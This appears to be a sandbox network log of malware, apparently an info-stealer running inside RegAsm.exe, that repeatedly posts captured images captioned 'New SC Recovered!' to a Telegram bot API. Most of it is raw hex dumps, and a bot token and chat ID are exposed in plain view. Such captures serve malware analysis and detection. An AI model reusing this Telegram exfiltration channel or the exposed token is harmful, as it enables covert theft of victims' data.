                                                2024-05-24 05:43:57 UTC | 1024 | OUT | Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 61 35 31 63 37 61 64 61 30 30 38 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 36 35 35 33 30 32 38 32 37 34 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 61 35 31 63 37 61 64 61 30 30 38 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 37 2f 31 35 2f 32 30 32 34 20 32 32 3a 30 31 3a 33 30 0a 55 73 65 72
                                                Data Ascii: -----------------------------8dca51c7ada008aContent-Disposition: form-data; name="chat_id"6553028274-----------------------------8dca51c7ada008aContent-Disposition: form-data; name="caption"New SC Recovered!Time: 07/15/2024 22:01:30User
                                                2024-05-24 05:43:57 UTC | 16355 | OUT | Data Raw: 02 77 00 01 02 03 11 04 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 72 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22
                                                Data Ascii: w!1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFrhU9oM4UofORx?"
                                                2024-05-24 05:43:57 UTC | 16355 | OUT | Data Raw: 3c 7b d7 28 27 99 61 68 44 ad e5 37 54 cf 07 f0 a8 ea e1 81 49 dd b1 d4 cc e5 25 68 c7 4b 05 14 51 5e 81 e4 85 14 51 40 09 5d 1f 85 27 86 18 ee bc d9 a3 8f 25 71 bd 80 cf 5f 5a e7 28 ac 6b d2 f6 b0 e5 bd 8e 9c 35 7f 61 53 9e d7 3d 0b ed f6 7f f3 f9 07 fd fd 5f f1 a4 fb 7d 97 fc fe 5b ff 00 df d5 ff 00 1a f3 ea 2b 8b fb 3f fb df 87 fc 13 d1 fe d6 fe e7 e3 ff 00 00 f4 1f b7 d9 7f cf e5 bf fd fd 5f f1 ae 3f 5f 92 39 75 89 de 27 57 43 b7 0c a7 20 fc a3 bd 67 51 5b 50 c2 7b 29 f3 73 5c e7 c4 e3 fd bc 39 39 6d f3 ff 00 80 14 51 45 76 9e 70 51 45 14 01 a5 e1 cf f9 0e db 7f c0 bf f4 13 5d d5 79 9d 26 07 a5 70 62 30 92 ab 3e 64 cf 53 0b 8e 8d 0a 7c 8d 5c f4 da 2b cc b0 3d 28 c0 f4 ac 3f b3 e5 fc c7 4f f6 ac 3f 95 9d cf 89 3f e4 05 71 ff 00 00 ff 00 d0 85 70 d4 62
                                                Data Ascii: <{('ahD7TI%hKQ^Q@]'%q_Z(k5aS=_}[+?_?_9u'WC gQ[P{)s\99mQEvpQE]y&pb0>dS|\+=(?O??qpb
                                                2024-05-24 05:43:57 UTC | 16355 | OUT | Data Raw: 31 a8 ff 00 c8 4a eb fe ba bf f3 35 c7 80 fe 23 f4 ff 00 23 5c d7 f8 2b d7 f4 65 7a 28 a2 bd 73 e7 42 8a 28 a0 0e d3 fe 59 e8 df ef 8f fd 12 f4 fb bd 62 ce d3 50 82 ca 57 c4 92 f7 ec be 99 fa d6 7e ad 7b fd 9d a3 e9 b7 61 37 98 ca e0 7b 98 98 0f e7 5c 25 c4 f2 dc ce f3 cc e5 e4 73 96 26 bc 9c 3e 1b db 2b bd 8f a8 c4 62 7d 8b b2 dc f5 92 46 40 cf 26 b3 1f fd 46 b5 fe f1 ff 00 d1 29 5c 7b 6b 17 33 5b da 5c 89 4f da ac 4e 0e 4f 0e 87 bf f4 3e b9 15 d3 58 de a6 a1 a4 ea b7 71 82 ab 21 63 83 d8 88 50 11 f9 8a ce a6 1e 54 a2 db fe b5 34 a7 88 8d 59 24 bf ad 0e 5a 8a 29 6b db 3e 50 4a 28 a2 80 29 ea 7f f1 ee bf ef 8f e4 6b 47 fe 11 eb 69 35 4d 32 28 a4 9b ec b7 70 79 cc cc c3 72 e0 12 79 c6 3d 2b 3b 53 ff 00 8f 75 ff 00 7c 7f 23 5b ba 7e a7 6a be 11 2f 24 f1 8b
                                                Data Ascii: 1J5##\+ez(sB(YbPW~{a7{\%s&>+b}F@&F)\{k3[\ONO>Xq!cPT4Y$Z)k>PJ()kGi5M2(pyry=+;Su|#[~j/$
                                                2024-05-24 05:43:57 UTC | 15447 | OUT | Data Raw: 5c b2 0a 28 a2 b6 39 c2 8a 28 a0 02 8a 28 a0 02 8a 28 a0 02 8a 28 a0 02 92 96 92 81 85 14 51 40 05 14 51 40 09 45 14 50 01 45 14 50 01 45 14 50 30 a4 a2 8a 00 28 a2 8a 60 14 51 45 00 14 51 45 00 25 14 51 40 c2 92 96 92 80 0a 28 a2 81 85 14 51 40 09 45 14 50 01 45 14 50 30 a4 34 bd a9 28 00 a2 8a 28 01 28 a2 8a 06 14 94 b4 94 00 51 45 14 00 94 52 d2 50 30 a2 8a 28 00 a4 a2 8a 63 0a 28 a2 80 12 8a 33 49 9a 06 2d 25 25 14 05 83 3e d4 99 a2 8a 06 14 94 b4 94 00 52 52 d2 50 30 a2 8a 28 18 52 51 45 00 14 94 b4 94 0c 28 a2 8a 00 4a 28 a2 81 88 68 a2 8a 00 29 29 69 28 18 52 52 d2 50 01 49 4b 45 05 09 45 14 94 02 16 92 8a 28 01 0d 14 51 40 c2 92 96 92 81 85 25 14 50 02 51 4b 49 40 c2 92 96 92 81 85 25 14 50 01 49 4b 45 03 12 8a 28 a0 61 49 45 25 00 2d 25 14 50 30
                                                Data Ascii: \(9((((Q@Q@EPEPEP0(`QEQE%Q@(Q@EPEP04(((QERP0(c(3I-%%>RRP0(RQE(J(h))i(RRPIKEE(Q@%PQKI@%PIKE(aIE%-%P0
                                                2024-05-24 05:43:57 UTC | 1168 | OUT | Data Raw: bc 2b 7a 8a c1 a2 a6 51 52 56 64 4e 0a 6a cc f4 cd 37 53 bb b9 6d af 79 b6 04 19 79 0e d0 71 e9 bb af eb 59 5e 2a f1 3c 12 5a bd 85 84 82 43 20 c4 92 2f 40 3d 07 ad 71 14 57 23 c1 a9 d5 55 2a 3b db 64 6d 4a 6e 95 37 05 d7 a8 51 45 15 dc 40 56 be 91 aa 2c 09 f6 79 ce 13 f8 5b d3 da 99 0f 87 35 79 e1 49 a3 b4 dd 1c 8a 19 4f 98 83 20 f2 3b d3 ff 00 e1 17 d6 bf e7 cb ff 00 22 a7 f8 d2 95 37 25 66 8c e7 c9 25 66 ce bf 4c d5 2f 26 64 86 2b b1 e5 ff 00 7f 0a 4a af b3 1e 45 47 e2 2f 14 5b 5a 5a 3d b5 94 c2 6b 96 05 77 29 c8 4f 7c f7 35 ca 7f c2 2f ad 7f cf 97 fe 45 4f f1 a3 fe 11 7d 6b fe 7c bf f2 2a 7f 8d 71 cf 00 ea cd 4a a3 6d 2e 86 b4 2a aa 31 71 4f 57 d4 c7 a2 b4 86 83 aa 30 04 5a f0 79 fb eb fe 35 9f 2c 6f 14 af 14 83 0e 84 ab 0f 42 2b b5 a6 84 9a 63 68 a2
                                                Data Ascii: +zQRVdNj7SmyyqY^*<ZC /@=qW#U*;dmJn7QE@V,y[5yIO ;"7%f%fL/&d+JEG/[ZZ=kw)O|5/EO}k|*qJm.*1qOW0Zy5,oB+ch
                                                2024-05-24 05:43:57 UTC | 50 | OUT | Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 61 35 31 63 37 61 64 61 30 30 38 61 2d 2d 0d 0a
                                                Data Ascii: -----------------------------8dca51c7ada008a--
                                                2024-05-24 05:43:58 UTC | 402 | IN | HTTP/1.1 400 Bad Request
                                                Server: nginx/1.18.0
                                                Date: Fri, 24 May 2024 05:43:58 GMT
                                                Content-Type: application/json
                                                Content-Length: 56
                                                Connection: close
                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                Access-Control-Allow-Origin: *
                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                {"ok":false,"error_code":400,"description":"Logged out"}


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                9 | 192.168.2.7 | 49715 | 149.154.167.220 | 443 | 6596 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                2024-05-24 05:43:59 UTC | 262 | OUT | POST /bot7043330881:AAFq19dRSS-89_wbwEvbuucof5Z3tCHG2NY/sendDocument HTTP/1.1
                                                Content-Type: multipart/form-data; boundary=---------------------------8dca773f71df223
                                                Host: api.telegram.org
                                                Content-Length: 66754
                                                Expect: 100-continue
                                                Connection: Keep-Alive
                                                2024-05-24 05:43:59 UTC | 1024 | OUT | Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 61 37 37 33 66 37 31 64 66 32 32 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 36 35 35 33 30 32 38 32 37 34 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 61 37 37 33 66 37 31 64 66 32 32 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 37 2f 31 38 2f 32 30 32 34 20 32 31 3a 34 32 3a 34 35 0a 55 73 65 72
                                                Data Ascii: -----------------------------8dca773f71df223Content-Disposition: form-data; name="chat_id"6553028274-----------------------------8dca773f71df223Content-Disposition: form-data; name="caption"New SC Recovered!Time: 07/18/2024 21:42:45User
                                                2024-05-24 05:43:59 UTC | 16355 | OUT | Data Raw: 02 77 00 01 02 03 11 04 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 72 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22
                                                Data Ascii: w!1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFrhU9oM4UofORx?"
                                                2024-05-24 05:43:59 UTC | 16355 | OUT | Data Raw: 3c 7b d7 28 27 99 61 68 44 ad e5 37 54 cf 07 f0 a8 ea e1 81 49 dd b1 d4 cc e5 25 68 c7 4b 05 14 51 5e 81 e4 85 14 51 40 09 5d 1f 85 27 86 18 ee bc d9 a3 8f 25 71 bd 80 cf 5f 5a e7 28 ac 6b d2 f6 b0 e5 bd 8e 9c 35 7f 61 53 9e d7 3d 0b ed f6 7f f3 f9 07 fd fd 5f f1 a4 fb 7d 97 fc fe 5b ff 00 df d5 ff 00 1a f3 ea 2b 8b fb 3f fb df 87 fc 13 d1 fe d6 fe e7 e3 ff 00 00 f4 1f b7 d9 7f cf e5 bf fd fd 5f f1 ae 3f 5f 92 39 75 89 de 27 57 43 b7 0c a7 20 fc a3 bd 67 51 5b 50 c2 7b 29 f3 73 5c e7 c4 e3 fd bc 39 39 6d f3 ff 00 80 14 51 45 76 9e 70 51 45 14 01 a5 e1 cf f9 0e db 7f c0 bf f4 13 5d d5 79 9d 26 07 a5 70 62 30 92 ab 3e 64 cf 53 0b 8e 8d 0a 7c 8d 5c f4 da 2b cc b0 3d 28 c0 f4 ac 3f b3 e5 fc c7 4f f6 ac 3f 95 9d cf 89 3f e4 05 71 ff 00 00 ff 00 d0 85 70 d4 62
                                                Data Ascii: <{('ahD7TI%hKQ^Q@]'%q_Z(k5aS=_}[+?_?_9u'WC gQ[P{)s\99mQEvpQE]y&pb0>dS|\+=(?O??qpb
                                                2024-05-24 05:43:59 UTC16355OUTData Raw: 31 a8 ff 00 c8 4a eb fe ba bf f3 35 c7 80 fe 23 f4 ff 00 23 5c d7 f8 2b d7 f4 65 7a 28 a2 bd 73 e7 42 8a 28 a0 0e d3 fe 59 e8 df ef 8f fd 12 f4 fb bd 62 ce d3 50 82 ca 57 c4 92 f7 ec be 99 fa d6 7e ad 7b fd 9d a3 e9 b7 61 37 98 ca e0 7b 98 98 0f e7 5c 25 c4 f2 dc ce f3 cc e5 e4 73 96 26 bc 9c 3e 1b db 2b bd 8f a8 c4 62 7d 8b b2 dc f5 92 46 40 cf 26 b3 1f fd 46 b5 fe f1 ff 00 d1 29 5c 7b 6b 17 33 5b da 5c 89 4f da ac 4e 0e 4f 0e 87 bf f4 3e b9 15 d3 58 de a6 a1 a4 ea b7 71 82 ab 21 63 83 d8 88 50 11 f9 8a ce a6 1e 54 a2 db fe b5 34 a7 88 8d 59 24 bf ad 0e 5a 8a 29 6b db 3e 50 4a 28 a2 80 29 ea 7f f1 ee bf ef 8f e4 6b 47 fe 11 eb 69 35 4d 32 28 a4 9b ec b7 70 79 cc cc c3 72 e0 12 79 c6 3d 2b 3b 53 ff 00 8f 75 ff 00 7c 7f 23 5b ba 7e a7 6a be 11 2f 24 f1 8b
                                                Data Ascii: 1J5##\+ez(sB(YbPW~{a7{\%s&>+b}F@&F)\{k3[\ONO>Xq!cPT4Y$Z)k>PJ()kGi5M2(pyry=+;Su|#[~j/$
                                                2024-05-24 05:43:59 UTC15447OUTData Raw: 5c b2 0a 28 a2 b6 39 c2 8a 28 a0 02 8a 28 a0 02 8a 28 a0 02 8a 28 a0 02 92 96 92 81 85 14 51 40 05 14 51 40 09 45 14 50 01 45 14 50 01 45 14 50 30 a4 a2 8a 00 28 a2 8a 60 14 51 45 00 14 51 45 00 25 14 51 40 c2 92 96 92 80 0a 28 a2 81 85 14 51 40 09 45 14 50 01 45 14 50 30 a4 34 bd a9 28 00 a2 8a 28 01 28 a2 8a 06 14 94 b4 94 00 51 45 14 00 94 52 d2 50 30 a2 8a 28 00 a4 a2 8a 63 0a 28 a2 80 12 8a 33 49 9a 06 2d 25 25 14 05 83 3e d4 99 a2 8a 06 14 94 b4 94 00 52 52 d2 50 30 a2 8a 28 18 52 51 45 00 14 94 b4 94 0c 28 a2 8a 00 4a 28 a2 81 88 68 a2 8a 00 29 29 69 28 18 52 52 d2 50 01 49 4b 45 05 09 45 14 94 02 16 92 8a 28 01 0d 14 51 40 c2 92 96 92 81 85 25 14 50 02 51 4b 49 40 c2 92 96 92 81 85 25 14 50 01 49 4b 45 03 12 8a 28 a0 61 49 45 25 00 2d 25 14 50 30
                                                Data Ascii: \(9((((Q@Q@EPEPEP0(`QEQE%Q@(Q@EPEP04(((QERP0(c(3I-%%>RRP0(RQE(J(h))i(RRPIKEE(Q@%PQKI@%PIKE(aIE%-%P0
                                                2024-05-24 05:43:59 UTC1168OUTData Raw: bc 2b 7a 8a c1 a2 a6 51 52 56 64 4e 0a 6a cc f4 cd 37 53 bb b9 6d af 79 b6 04 19 79 0e d0 71 e9 bb af eb 59 5e 2a f1 3c 12 5a bd 85 84 82 43 20 c4 92 2f 40 3d 07 ad 71 14 57 23 c1 a9 d5 55 2a 3b db 64 6d 4a 6e 95 37 05 d7 a8 51 45 15 dc 40 56 be 91 aa 2c 09 f6 79 ce 13 f8 5b d3 da 99 0f 87 35 79 e1 49 a3 b4 dd 1c 8a 19 4f 98 83 20 f2 3b d3 ff 00 e1 17 d6 bf e7 cb ff 00 22 a7 f8 d2 95 37 25 66 8c e7 c9 25 66 ce bf 4c d5 2f 26 64 86 2b b1 e5 ff 00 7f 0a 4a af b3 1e 45 47 e2 2f 14 5b 5a 5a 3d b5 94 c2 6b 96 05 77 29 c8 4f 7c f7 35 ca 7f c2 2f ad 7f cf 97 fe 45 4f f1 a3 fe 11 7d 6b fe 7c bf f2 2a 7f 8d 71 cf 00 ea cd 4a a3 6d 2e 86 b4 2a aa 31 71 4f 57 d4 c7 a2 b4 86 83 aa 30 04 5a f0 79 fb eb fe 35 9f 2c 6f 14 af 14 83 0e 84 ab 0f 42 2b b5 a6 84 9a 63 68 a2
                                                Data Ascii: +zQRVdNj7SmyyqY^*<ZC /@=qW#U*;dmJn7QE@V,y[5yIO ;"7%f%fL/&d+JEG/[ZZ=kw)O|5/EO}k|*qJm.*1qOW0Zy5,oB+ch
                                                2024-05-24 05:43:59 UTC50OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 61 37 37 33 66 37 31 64 66 32 32 33 2d 2d 0d 0a
                                                Data Ascii: -----------------------------8dca773f71df223--
                                                2024-05-24 05:44:00 UTC25INHTTP/1.1 100 Continue
                                                2024-05-24 05:44:00 UTC402INHTTP/1.1 400 Bad Request
                                                Server: nginx/1.18.0
                                                Date: Fri, 24 May 2024 05:44:00 GMT
                                                Content-Type: application/json
                                                Content-Length: 56
                                                Connection: close
                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                Access-Control-Allow-Origin: *
                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                {"ok":false,"error_code":400,"description":"Logged out"}


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                10 | 192.168.2.7 | 49716 | 149.154.167.220 | 443 | 6596 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                2024-05-24 05:44:06 UTC | 262 | OUT | POST /bot7043330881:AAFq19dRSS-89_wbwEvbuucof5Z3tCHG2NY/sendDocument HTTP/1.1
                                                Content-Type: multipart/form-data; boundary=---------------------------8dcaba1a50f6e18
                                                Host: api.telegram.org
                                                Content-Length: 66754
                                                Expect: 100-continue
                                                Connection: Keep-Alive
                                                2024-05-24 05:44:06 UTC | 25 | IN | HTTP/1.1 100 Continue
                                                2024-05-24 05:44:06 UTC | 1024 | OUT | Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 61 62 61 31 61 35 30 66 36 65 31 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 36 35 35 33 30 32 38 32 37 34 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 61 62 61 31 61 35 30 66 36 65 31 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 37 2f 32 34 2f 32 30 32 34 20 30 35 3a 32 39 3a 34 35 0a 55 73 65 72
                                                Data Ascii: -----------------------------8dcaba1a50f6e18Content-Disposition: form-data; name="chat_id"6553028274-----------------------------8dcaba1a50f6e18Content-Disposition: form-data; name="caption"New SC Recovered!Time: 07/24/2024 05:29:45User
                                                2024-05-24 05:44:06 UTC | 16355 | OUT | Data Raw: 02 77 00 01 02 03 11 04 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 72 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22
                                                Data Ascii: w!1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFrhU9oM4UofORx?"
                                                2024-05-24 05:44:06 UTC | 16355 | OUT | Data Raw: 3c 7b d7 28 27 99 61 68 44 ad e5 37 54 cf 07 f0 a8 ea e1 81 49 dd b1 d4 cc e5 25 68 c7 4b 05 14 51 5e 81 e4 85 14 51 40 09 5d 1f 85 27 86 18 ee bc d9 a3 8f 25 71 bd 80 cf 5f 5a e7 28 ac 6b d2 f6 b0 e5 bd 8e 9c 35 7f 61 53 9e d7 3d 0b ed f6 7f f3 f9 07 fd fd 5f f1 a4 fb 7d 97 fc fe 5b ff 00 df d5 ff 00 1a f3 ea 2b 8b fb 3f fb df 87 fc 13 d1 fe d6 fe e7 e3 ff 00 00 f4 1f b7 d9 7f cf e5 bf fd fd 5f f1 ae 3f 5f 92 39 75 89 de 27 57 43 b7 0c a7 20 fc a3 bd 67 51 5b 50 c2 7b 29 f3 73 5c e7 c4 e3 fd bc 39 39 6d f3 ff 00 80 14 51 45 76 9e 70 51 45 14 01 a5 e1 cf f9 0e db 7f c0 bf f4 13 5d d5 79 9d 26 07 a5 70 62 30 92 ab 3e 64 cf 53 0b 8e 8d 0a 7c 8d 5c f4 da 2b cc b0 3d 28 c0 f4 ac 3f b3 e5 fc c7 4f f6 ac 3f 95 9d cf 89 3f e4 05 71 ff 00 00 ff 00 d0 85 70 d4 62
                                                Data Ascii: <{('ahD7TI%hKQ^Q@]'%q_Z(k5aS=_}[+?_?_9u'WC gQ[P{)s\99mQEvpQE]y&pb0>dS|\+=(?O??qpb
                                                2024-05-24 05:44:06 UTC | 16355 | OUT | Data Raw: 31 a8 ff 00 c8 4a eb fe ba bf f3 35 c7 80 fe 23 f4 ff 00 23 5c d7 f8 2b d7 f4 65 7a 28 a2 bd 73 e7 42 8a 28 a0 0e d3 fe 59 e8 df ef 8f fd 12 f4 fb bd 62 ce d3 50 82 ca 57 c4 92 f7 ec be 99 fa d6 7e ad 7b fd 9d a3 e9 b7 61 37 98 ca e0 7b 98 98 0f e7 5c 25 c4 f2 dc ce f3 cc e5 e4 73 96 26 bc 9c 3e 1b db 2b bd 8f a8 c4 62 7d 8b b2 dc f5 92 46 40 cf 26 b3 1f fd 46 b5 fe f1 ff 00 d1 29 5c 7b 6b 17 33 5b da 5c 89 4f da ac 4e 0e 4f 0e 87 bf f4 3e b9 15 d3 58 de a6 a1 a4 ea b7 71 82 ab 21 63 83 d8 88 50 11 f9 8a ce a6 1e 54 a2 db fe b5 34 a7 88 8d 59 24 bf ad 0e 5a 8a 29 6b db 3e 50 4a 28 a2 80 29 ea 7f f1 ee bf ef 8f e4 6b 47 fe 11 eb 69 35 4d 32 28 a4 9b ec b7 70 79 cc cc c3 72 e0 12 79 c6 3d 2b 3b 53 ff 00 8f 75 ff 00 7c 7f 23 5b ba 7e a7 6a be 11 2f 24 f1 8b
                                                Data Ascii: 1J5##\+ez(sB(YbPW~{a7{\%s&>+b}F@&F)\{k3[\ONO>Xq!cPT4Y$Z)k>PJ()kGi5M2(pyry=+;Su|#[~j/$
                                                2024-05-24 05:44:06 UTC | 15447 | OUT | Data Raw: 5c b2 0a 28 a2 b6 39 c2 8a 28 a0 02 8a 28 a0 02 8a 28 a0 02 8a 28 a0 02 92 96 92 81 85 14 51 40 05 14 51 40 09 45 14 50 01 45 14 50 01 45 14 50 30 a4 a2 8a 00 28 a2 8a 60 14 51 45 00 14 51 45 00 25 14 51 40 c2 92 96 92 80 0a 28 a2 81 85 14 51 40 09 45 14 50 01 45 14 50 30 a4 34 bd a9 28 00 a2 8a 28 01 28 a2 8a 06 14 94 b4 94 00 51 45 14 00 94 52 d2 50 30 a2 8a 28 00 a4 a2 8a 63 0a 28 a2 80 12 8a 33 49 9a 06 2d 25 25 14 05 83 3e d4 99 a2 8a 06 14 94 b4 94 00 52 52 d2 50 30 a2 8a 28 18 52 51 45 00 14 94 b4 94 0c 28 a2 8a 00 4a 28 a2 81 88 68 a2 8a 00 29 29 69 28 18 52 52 d2 50 01 49 4b 45 05 09 45 14 94 02 16 92 8a 28 01 0d 14 51 40 c2 92 96 92 81 85 25 14 50 02 51 4b 49 40 c2 92 96 92 81 85 25 14 50 01 49 4b 45 03 12 8a 28 a0 61 49 45 25 00 2d 25 14 50 30
                                                Data Ascii: \(9((((Q@Q@EPEPEP0(`QEQE%Q@(Q@EPEP04(((QERP0(c(3I-%%>RRP0(RQE(J(h))i(RRPIKEE(Q@%PQKI@%PIKE(aIE%-%P0
                                                2024-05-24 05:44:06 UTC | 1168 | OUT | Data Raw: bc 2b 7a 8a c1 a2 a6 51 52 56 64 4e 0a 6a cc f4 cd 37 53 bb b9 6d af 79 b6 04 19 79 0e d0 71 e9 bb af eb 59 5e 2a f1 3c 12 5a bd 85 84 82 43 20 c4 92 2f 40 3d 07 ad 71 14 57 23 c1 a9 d5 55 2a 3b db 64 6d 4a 6e 95 37 05 d7 a8 51 45 15 dc 40 56 be 91 aa 2c 09 f6 79 ce 13 f8 5b d3 da 99 0f 87 35 79 e1 49 a3 b4 dd 1c 8a 19 4f 98 83 20 f2 3b d3 ff 00 e1 17 d6 bf e7 cb ff 00 22 a7 f8 d2 95 37 25 66 8c e7 c9 25 66 ce bf 4c d5 2f 26 64 86 2b b1 e5 ff 00 7f 0a 4a af b3 1e 45 47 e2 2f 14 5b 5a 5a 3d b5 94 c2 6b 96 05 77 29 c8 4f 7c f7 35 ca 7f c2 2f ad 7f cf 97 fe 45 4f f1 a3 fe 11 7d 6b fe 7c bf f2 2a 7f 8d 71 cf 00 ea cd 4a a3 6d 2e 86 b4 2a aa 31 71 4f 57 d4 c7 a2 b4 86 83 aa 30 04 5a f0 79 fb eb fe 35 9f 2c 6f 14 af 14 83 0e 84 ab 0f 42 2b b5 a6 84 9a 63 68 a2
